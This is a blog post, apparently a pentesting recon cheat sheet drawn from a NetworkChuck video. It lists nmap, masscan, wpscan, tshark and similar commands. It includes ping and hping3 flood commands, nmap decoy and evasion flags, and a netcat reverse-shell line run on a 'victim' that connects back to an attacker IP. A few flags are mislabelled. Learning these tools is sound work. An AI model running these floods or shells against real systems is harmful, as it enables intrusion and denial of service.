Recon Playbook Pt.1

adotvoid

7 min read
Recon Playbook Pt.1

I was moseying down the youtube rabbit hole one day and came across a Network Chuck video which had a whole host of great commands for those getting going with reconnaissance + OSINT and it occurred to me that these commands were somewhat of a playbook for getting a digital footprint on a target, plus a few fun things put into the mix. It also seems likely that I'll have further tips and tricks down the line so I'll try and put up a part 2 soon. In the meantime, thanks to NetworkChuck for the great video - fill your boots 🥾 😁

Commands as per -> https://www.youtube.com/watch?v=gL4j-a-g9pA

PING

ping <ip_address> Ping a host to see if it’s up.

ping -s 1300 <ip_address> Specify the size of the packet to be sent to test the capabilities of the firewall.

ping -s 1300 -f <ip_address> Flood the target with a huge number of packets (-f stands for flood).

If we run iftop on our target we can see this in action. To do so install iftop

apt install iftop then run iftop

HPING

apt insall hping3 Install

hping3 -S —flood -V -p 80 <ip_address> This is the same as a ping flood. Here, the -S stands for a TCP packet, the -V is for verbose mode and the p for initialising the port.

hping3 --traceroute -V -1 example.com Here the -1 means we’re going to send ICMP packets to do a traceroute. However, sometimes this command is inhibited by a firewall. Instead we can use: hping3 --traceroute -V -p 80 -S example.com To send TCP instead (-S) and send it via web traffic instead (-p / port 80 / http instead)

hping3 --traceroute -V -p 53 --udp example.com …or via UDP instead.

PTUNNEL

apt install ptunnel Install

On the target side just run ptunnel

NMAP

nmap -sn <ip_oddress> no port scanning / quick mapping

nmap -sV <ip_address> service discovery

nmap -O <ip_address> OS detection -> this can be blocked by firewalls blocking ping probes instead try below:

nmap -0 -Pn <ip_address>OS detection without ping probe

nmap -sL <ip_address>/<subnet> quick hostname scan on a network

nmap --script vuln <ip_address> check for vulnerabilities

nmap --script malware <ip_address> scan for known malware

nmap -A <ip_address> Scan for pretty much everything, but be ready to wait for a looooong time...OS detection, version detection, default script scanning + trace routing

nmap -t <ip_address> fragment our packets and make it harder for you to be detected when scanning

nmap --source-port <port> <ip_address>/<subnet> Change our port - using a different source port one can pretend to be DNS, for instance

nmap -D RND:10 <ip_address>/<subnet> DECOYS! Sends from 10 random IP address to decoy where we are pinging from

MASSCAN

apt install masscan Install

masscan -p80,443,22 <ip_address>/<subnet> --rate=1000Specify port to scan as well as speed at which to scan

masscan <ip_address>/<subnet> -pO-65535 --rate=1000 Scan the entire 10 point subnet range (takes a while…)

masscan -p80,443 <ip_address>/<subnet> --rate=1000 --randomize-hosts Randomise the order in which we scan hosts to help subvert our actions

masscan -p23 <ip_address>/<subnet> --rate=1000 Find servers running telnet on a network (big no-no!)

ALIAS

alias ll="ls -la" Set an alias command

WHOIS

apt install whois Install

whois <domain> Get publicly available information about any domain e.g. google.com

WHATWEB

Whatweb is a webscanner. This is what it says on the github:

WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

apt install whatweb Install

whatweb <domain> Takes some time ⏳

CURL

curl -i <domain> Gives you the response and all the headers of the website. Can be used if you’re curious about the possibility of an IDOR or when [fuzzing](https://www.imperva.com/learn/application-security/fuzzing-fuzz-testing/#:~:text=Attack Types-,What is Fuzzing (Fuzz Testing)%3F,large volume of random inputs.). Also handy when hacking APIs to see if an endpoint it accessible.

curl -i <domain> -H 'X-API-TOKEN: <api_token>' Set a custom header (instead of setting it in the browser.

NIKTO

apt install nikto Install

nikto -h <domain> Set the domain and let it rip!

GOBUSTER

gobuster dir -u <url> -w <wordlist> Enumerate directories and files.

gobuster dns -d <domain> -w <wordlist> Enumerate subdomains (use a DNS wordlist).

SUBLIST3R

apt install sublist3r Install

sublist3r -d <domain> Sublist3r usage.

WPSCAN

wpscan --url <domain> --enumerate u Wpscan usage (the ‘u’ stands for users)

wpscan --url <domain> --enumerate u p Use with ‘p’ flag for plugins. Worldpress plugins are a notorious place to search for vulnerabilities.

wpscan --url <domain> --enumerate t Use with ‘p’ flag for plugins. Worldpress themes, again, notorious place to search for vulnerabilities.

wpscan --url <domain> --enumerate vp,vt --plugins-detecttion aggressive --api-token <api_token> Aggressive vulnerability scan. NOTE: You’ll need an API key for this which you can get from here.

AMASS

apt install amass Install

amass enum -d <domain> Chucks out a whooooole lot of stuff!

amass enum passive -d <domain> Do to a passive scan

SEARCHSPLOIT

git clone <https://gitlab.com/exploit-database/exploitdb.git> Clone the tool. If you like you can download it into your opt folder like so:

git clone <https://gitlab.com/exploit-database/exploitdb.git> /opt/exploit-database then we’re going to add it to our binaries with this command: ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit

You should now be able to use the tool by simply typing:

searchsploit

For example searchsploit wordpress plugins will render the following:

Output from searchsploit wordpress plugins

You can update the database by running

searchsploit -u

TCPDUMP

tcpdump -w <name_of_file_to_write_to> -i eth0 Use the -w to write to a file (specifying the name) and use the interface you want, in this case we’re using eth0

We can then analyse the traffic using:

tcpdump -r <name_of_file_just_written>

We an also limit the number of packets captured (the -c flag stands for counts):

tcpdump -i eth0 -c 100

TSHARK

NOTE: I had some issues installing this. This may be due to me running Kali on Kasm, as there are a few eccentricities with the set up, so if you’re running plain ol’ Ubuntu or any other Linux distro you may not need to do the following steps.

*apt-get update then apt-get upgrade -y (the y passes on user confirmation)*

Then….

apt install tshark or apt-get install tshark to install.

tshark -V -c 1 -i eth0 Here the V stands for ‘verbose’ mode and the c flag is also for ‘count’. So here we’re only capturing 1 packet on the Ethernet 0 interface.

tshark -Y'http.request.method == "GET"' -i eth0 Capture only packets using the specified request method on specific interface (to try this out, after running the command above open a new terminal tab and make a curl request - you’ll see the request recorded by Tshark).

timeout 15 tshark -i eth0 -w <file_name>.pcap Here, we can set a timeout for a specific time period to capture traffic (in seconds btw) and write (-w) it to a file (name of your choosing but remember to use the .pcap extension).

tshark -r <your_file_name>.pcap -qz endpoints,ip This can be run against your previously captured file to check for endpoints.

tshark -r <your_file_name>.pcap -q -z follow,tcp,ascii,7 We can also follow a tcp stream (the number at the end there specifies the stream number).

tshark -e ip.src -e ip.dst -e frame.protocols -T fields -r <your_file_name>.pcap We can also do custom output of fields.

TMUX

I’m still not convinced by tmux as I find it a little too easy to get lost, and I also find that the keyboard shortcuts are less than convivial. That said, when you get a shell, it’s quite nice to be able to run a few different views.

CTRL + B and then D to detach from current window.

tmux a to get back to it.

exit to exit tmux.

tmux new -s <name_of_session> Create and name a new session window.

tmux ls List all current active sessions.

tmux a -t <name_of_session> Go to particular session (the -t flag is for ‘target’)

CTRL + B and then W to quickly jump between tmux sessions.

SSH

ssh <username>@<ip_address> 'whoami' Run a command on machine without logging in, for instance see the user by running ‘whoami’…

ssh -D 1337 -C -q -N root@<ip_address> Make the server a socks proxy (-D initialise socks proxy, then a port number, -C is for compression, -q for quite mode and -N to not execute any commands). Then launch chromium using your server as your proxy with the command below: chromium —no-sandbox —proxy-server=”socks5://localhost:1337”

NETCAT

apt install netcat-traditional Install.

nc -lvnp <port_to_listen_on> I’ve used this for a while without really knowing what all the switches do. -l listens for inbound connects, -v is for verbose mode, -n is for numeric only (no DNS) and -p is for port.

Then on our victims machine we issue the command:

nc -e /bin/bash <attacker_ip_address> <attacker_port>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thanks all - hope you find the above useful!

Read more